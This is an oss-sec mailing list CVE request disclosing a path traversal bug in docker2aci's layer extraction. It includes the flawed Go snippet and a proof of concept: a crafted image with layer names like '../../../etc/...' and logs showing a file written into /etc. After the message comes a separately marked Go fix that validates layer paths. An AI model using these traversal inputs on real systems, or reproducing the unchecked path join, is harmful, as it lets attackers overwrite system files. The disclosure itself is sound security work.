oss-sec mailing list archives

CVE Request: docker2aci: Path traversals present in image converting


From: 张开翔 <zhangkaixiang () 360 cn>
Date: Wed, 28 Sep 2016 08:27:15 +0000

DESCRIPTION



This is Kaixiang Zhang of the Cloud Security Team, Qihoo 360. I recently submitted a path traversal vulnerability to docker2aci 
<https://github.com/appc/docker2aci/issues/201>. The issue exists in image converting: there is a 
possibility that it extracts embedded layer data to arbitrary directories or paths, since there is no essential check of the 
output file path. Could you please assign a CVE number for it? Thanks.



Source info



tmpLayerPath := path.Join(tmpDir, layerIDs[i])
tmpLayerPath += ".tar"
layerFile, err := extractEmbeddedLayer(lb.file, layerIDs[i], tmpLayerPath) // without essential check for layerpath, may break out of tmpDir.



Proof-of-concept



Build or download a malicious image as an archive file containing some layer files with relative names, like 
“../../../etc/ filename”, and modify the content of the corresponding json file related to it. Then run 
docker2aci to convert the Docker image to ACI. Overview of the content of the malicious image:

../../../etc

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/json

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/VERSION

../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625/layer.tar


and logs:
tmpDir:  /tmp/docker2aci-878549369
tmpLayerPath:  /etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625.tar
Extracting ../../../etc

Then check the results:  ls /etc/*.tar
/etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625.tar

Of course, you can modify the tar file content yourself.

Best regards,
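
An added example, not part of the original message and not docker2aci's own code or fix: one way to perform the missing check on the layer path in Go. The helper name safeLayerPath is hypothetical; the tmpDir value is taken from the log above and the layer IDs are constructed sample inputs.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// safeLayerPath is a hypothetical helper (not docker2aci code). It builds
// <tmpDir>/<layerID>.tar the same way as the reported snippet, then rejects
// any layerID whose resulting path is not a file directly inside tmpDir.
func safeLayerPath(tmpDir, layerID string) (string, error) {
	base := filepath.Clean(tmpDir)
	// Same construction as the reported code: join, then append ".tar".
	candidate := filepath.Join(base, layerID) + ".tar"
	rel, err := filepath.Rel(base, candidate)
	if err != nil {
		return "", fmt.Errorf("layer ID %q: %v", layerID, err)
	}
	sep := string(filepath.Separator)
	// Reject ".." components (escape) and separators (nested directories).
	// An empty layerID yields "<tmpDir>.tar", which is also caught here.
	if rel == ".." || strings.HasPrefix(rel, ".."+sep) || strings.Contains(rel, sep) {
		return "", fmt.Errorf("layer ID %q resolves outside %s", layerID, base)
	}
	return candidate, nil
}

func main() {
	tmpDir := "/tmp/docker2aci-878549369" // value from the report's log
	// Constructed inputs: a well-formed ID and one shaped like the report's.
	ids := []string{
		"0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625",
		"../../../etc/0ca87058da90257128ca83a1d0e1bd55236f43c75b915120c70498af6ad37625",
	}
	for _, id := range ids {
		p, err := safeLayerPath(tmpDir, id)
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("ok:", p)
	}
}
```

The check runs on the final path, after ".tar" is appended, so it validates exactly the string that would be handed to the extraction call.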
